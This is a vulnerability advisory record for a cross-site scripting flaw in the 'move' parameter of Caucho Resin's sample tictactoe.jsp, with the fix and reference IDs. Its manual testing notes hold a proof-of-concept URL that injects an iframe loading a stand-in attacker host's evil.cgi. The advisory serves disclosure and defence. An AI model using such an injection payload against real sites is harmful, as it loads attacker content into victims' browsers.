ID OSVDB:3393 Type osvdb Reporter Donnie Werner(wood@e2-labs.com) Modified 2003-10-20T00:00:00
Description
Vulnerability Description
Caucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the "move" variable upon submission to the "tictactoe.jsp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Solution Description
Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): removing the tictactoe.jsp script
Short Description
Caucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the "move" variable upon submission to the "tictactoe.jsp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
{"title": "Caucho Resin tictactoe.jsp move Variable XSS", "published": "2003-10-20T00:00:00", "references": [], "type": "osvdb", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-04-28T13:19:57", "rev": 2}, "dependencies": {"references": [], "modified": "2017-04-28T13:19:57", "rev": 2}, "vulnersScore": 0.4}, "cvelist": [], "viewCount": 0, "affectedSoftware": [{"version": "2.0 b2", "name": "Resin", "operator": "eq"}, {"version": "2.1.1", "name": "Resin", "operator": "eq"}, {"version": "2.1.2", "name": "Resin", "operator": "eq"}, {"version": "2.1.s020711", "name": "Resin", "operator": "eq"}, {"version": "2.0", "name": "Resin", "operator": "eq"}], "id": "OSVDB:3393", "modified": "2003-10-20T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:3393", "edition": 1, "description": "## Vulnerability Description\nCaucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the \"move\" variable upon submission to the \"tictactoe.jsp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): removing the tictactoe.jsp script\n## Short Description\nCaucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the \"move\" variable upon submission to the \"tictactoe.jsp\" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src=\"http://[attacker]/evil.cgi\"></iframe>\n## References:\nVendor URL: http://www.caucho.com/resin/index.xtp\nSnort Signature ID: 1497\n[Secunia Advisory ID:10031](https://secuniaresearch.flexerasoftware.com/advisories/10031/)\n[Related OSVDB ID: 3394](https://vulners.com/osvdb/OSVDB:3394)\n[Related OSVDB ID: 3390](https://vulners.com/osvdb/OSVDB:3390)\n[Related OSVDB ID: 4983](https://vulners.com/osvdb/OSVDB:4983)\n[Related OSVDB ID: 3388](https://vulners.com/osvdb/OSVDB:3388)\n[Nessus Plugin ID:10815](https://vulners.com/search?query=pluginID:10815)\nKeyword: EXPL-A-2003-026 exploitlabs.com Advisory 026\nISS X-Force ID: 13460\nGeneric Informational URL: http://lists.netsys.com/pipermail/full-disclosure/2003-October/012361.html\nBugtraq ID: 8852\n", "bulletinFamily": "software", "reporter": "Donnie Werner(wood@e2-labs.com)", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2017-04-28T13:19:57"}